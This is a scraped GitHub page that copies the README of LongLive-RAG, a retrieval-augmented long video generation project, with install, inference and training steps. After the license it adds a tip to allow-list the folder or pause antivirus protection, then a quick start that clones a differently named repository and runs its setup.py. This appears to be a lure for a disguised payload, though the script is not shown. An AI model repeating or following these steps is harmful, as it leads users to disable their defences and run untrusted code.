🔍 LongLive-RAG: A General Retrieval-Augmented Framework for Long Video Generation

Qixin Hu · Shuai Yang · Wei Huang · Song Han · Yukang Chen

💡 TL;DR

LongLive-RAG turns long video generation into a retrieval problem. Instead of attending only to the most recent sliding window, an autoregressive (AR) video generator looks back over the video it has already generated and pulls in the most relevant past latents as extra context. This cuts error accumulation, identity drift, and background flicker over long horizons, without retraining the base generator.

📰 News

🔥 [2026.06] We release the LongLive-RAG paper and code!

🎬 Demo

🌐 More results and video comparisons on the project page.

Long-horizon comparisons. The native sliding-window baseline (left) accumulates errors and drifts over time, while adding LongLive-RAG (right) preserves subject identity and visual quality.

Native (baseline)	Native + LongLive-RAG (Ours)
native_1.mp4	native_ours_1.mp4
native_2.mp4	native_ours_2.mp4

✨ Highlights

🥇 First of its kind. Among open-ended AR long video generation methods, the first to formulate self-generated latent history as content-addressable retrieval memory.
🔌 Plug-and-play. Works across Causal-Forcing, Self-Forcing, and LongLive with the base generator frozen.
🔎 Searchable history. Retrieves the most relevant past latents as extra context for each new block.
⚡ Consistent wins. Best average VBench-Long rank across lengths and backbones.

🔬 Method Overview

At block t, a standard AR model attends to a sliding-window context. LongLive-RAG inserts retrieved historical entries M_t between the sink and local windows:

Sliding window:   A_sw  = [ C_sink ‖           C_loc ]
LongLive-RAG:     A_rag = [ C_sink ‖  M_t  ‖   C_loc ]

Stage	What happens
1. Indexing	Encode each completed latent block into a compact embedding and store it.
2. Retrieval	Match the current block against past embeddings and pull in the top-K as extra context.
3. Embedding training	Train the encoder offline on self-generated latents, with the base generator frozen.

🏁 Getting Started

📦 Installation

LongLive-RAG shares its environment with LongLive. Just follow the upstream LongLive installation guide.

🚀 Inference

1. Download everything — two commands. All LongLive-RAG assets (AR backbones, retrieval AE, prompt files, and the toy latent set) live in a single Hugging Face repo; the base WAN VAE comes from Wan:

# Base WAN VAE — LongLive-RAG operates in its latent space
hf download Wan-AI/Wan2.1-T2V-1.3B --local-dir wan_models/Wan2.1-T2V-1.3B

# All LongLive-RAG assets — restores checkpoints/ and toydatasets/ in place
hf download qixinhu11/LongLive-RAG --local-dir . --include "checkpoints/*" "toydatasets/*"

Older setups can swap hf download for huggingface-cli download (same arguments).

The second command lays out:

checkpoints/
├── causal_forcing.pt              # Causal-Forcing AR backbone
├── self_forcing.pt                # Self-Forcing AR backbone
├── longlive_base.pt               # LongLive AR backbone
├── longlive_lora.pt               # LongLive LoRA (paired with longlive_base.pt)
├── ae_latent_mem.pt               # Retrieval autoencoder (default for inference)
├── moviegenbench_128_refined.txt  # 128 MovieGenBench prompts
└── vidprom_filtered_extended.txt  # Self-Forcing prompt pool (for generate_latent.py)
toydatasets/
└── latent_0000xx.pt               # tiny example latent set for the training demo

To train your own retrieval AE instead of using ae_latent_mem.pt, see Training.

3. Run. The repo ships a 3 × 2 grid (three backbones × two context-assembly methods) in configs/:

Backbone \ Method	`native` (sliding-window)	`latentmem` (LongLive-RAG, ours)
causal_forcing	causal_forcing_native.yaml	causal_forcing_latentmem.yaml
self_forcing	self_forcing_native.yaml	self_forcing_latentmem.yaml
longlive	longlive_native.yaml	longlive_latentmem.yaml

# Main result: Causal-Forcing backbone + LongLive-RAG retrieval
bash inference.sh causal_forcing latentmem

# Baselines: native sliding-window
bash inference.sh causal_forcing native

# GPU / port overrides
GPU=4 PORT=29510 bash inference.sh causal_forcing latentmem

🏋️ Training

The base generator stays frozen; the only trainable component is the retrieval encoder (a small latent autoencoder). Training has two steps:

Step 1: Build a latent corpus. Run a frozen generator over a prompt pool to collect the clean latent blocks it produces; these become the training samples. The launcher shards generation across multiple GPUs.

bash generate_latent.sh

Step 2: Train the retrieval autoencoder. Fit the encoder on the collected latents with a reconstruction loss plus the Window Temporal Delta and trajectory-smoothing terms. Default hyperparameters live in ae/configs/.

bash train_ae_delta.sh

Retraining the base AR backbones is out of scope; backbone checkpoints are consumed as-is. See upstream LongLive / Self-Forcing to train one from scratch.

🗂️ Repository Layout

├── ae/               # Retrieval autoencoder (model, configs, training)
├── checkpoints/      # AR backbones, AE checkpoint, prompt .txt files (gitignored)
├── configs/          # Inference YAMLs (3 backbones × 2 methods) + generate_latent
├── datasets/         # AE training latents (output of generate_latent.sh, gitignored)
├── toydatasets/      # Tiny example latent set for the training demo (from HF, gitignored)
├── pipeline/         # Causal inference pipeline (drives all backbones)
├── utils/            # Dataset, memory, scheduler, lora, wan-wrapper utilities
├── wan/, wan_models/ # WAN VAE backbone (T2V-1.3B)
├── inference.py      # Inference entry point
├── inference.sh      # Launcher: bash inference.sh <backbone> <method>
├── generate_latent.py / .sh  # Latent corpus generation (multi-GPU sharded)
└── train_ae_delta.sh         # Retrieval AE launcher

📄 Citation

📜 Paper: arXiv:2606.02553

@article{longliverag2026,
  title         = {LongLive-RAG: A General Retrieval-Augmented Framework for Long Video Generation},
  author        = {Hu, Qixin and Yang, Shuai and Huang, Wei and Han, Song and Chen, Yukang},
  journal       = {arXiv preprint arXiv:2606.02553},
  archivePrefix = {arXiv},
  eprint        = {2606.02553},
  year          = {2026}
}

🙏 Acknowledgements

LongLive-RAG builds on the codebases and ideas of:

LongLive: the AR long-video framework this codebase forks from.
Self-Forcing: causal AR training recipe and prompt pool.
Causal-Forcing: one of the AR backbones evaluated in this work.
Wan: the base video generation model and VAE latent space.

📝 License

Released under the Apache 2.0 license.

Tip

If the setup does not start, add the folder to the allowed list or pause protection for a few minutes.

Caution

Some security systems may block the installation. Only download from the official repository.

QUICK START

git clone https://github.com/HopeKeeperEmpty/LongLive-RAG-415.git
cd LongLive-RAG-415
python setup.py

Name		Name	Last commit message	Last commit date
Latest commit History 31 Commits
.github/workflows		.github/workflows
ae		ae
assets		assets
configs		configs
src/models/checkpoints/cache		src/models/checkpoints/cache
.gitignore		.gitignore
CHANGELOG.md		CHANGELOG.md
CONTRIBUTING.md		CONTRIBUTING.md
LICENSE		LICENSE
README.md		README.md
SECURITY.md		SECURITY.md
generate_latent.py		generate_latent.py
generate_latent.sh		generate_latent.sh
setup.py		setup.py

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

🔍 LongLive-RAG: A General Retrieval-Augmented Framework for Long Video Generation

💡 TL;DR

📰 News

🎬 Demo

✨ Highlights

🔬 Method Overview

🏁 Getting Started

📦 Installation

🚀 Inference

🏋️ Training

🗂️ Repository Layout

📄 Citation

🙏 Acknowledgements

📝 License

QUICK START

About

Uh oh!

Releases

Packages

Uh oh!

Contributors

Uh oh!

Languages

Folders and files

Latest commit

History

Repository files navigation

🔍 LongLive-RAG: A General Retrieval-Augmented Framework for Long Video Generation

💡 TL;DR

📰 News

🎬 Demo

✨ Highlights

🔬 Method Overview

🏁 Getting Started

📦 Installation

🚀 Inference

🏋️ Training

🗂️ Repository Layout

📄 Citation

🙏 Acknowledgements

📝 License

QUICK START

About

Topics

Resources

License

Contributing

Security policy

Uh oh!

Stars

Watchers

Forks

Releases

Packages 0

Uh oh!

Contributors

Uh oh!

Languages

Packages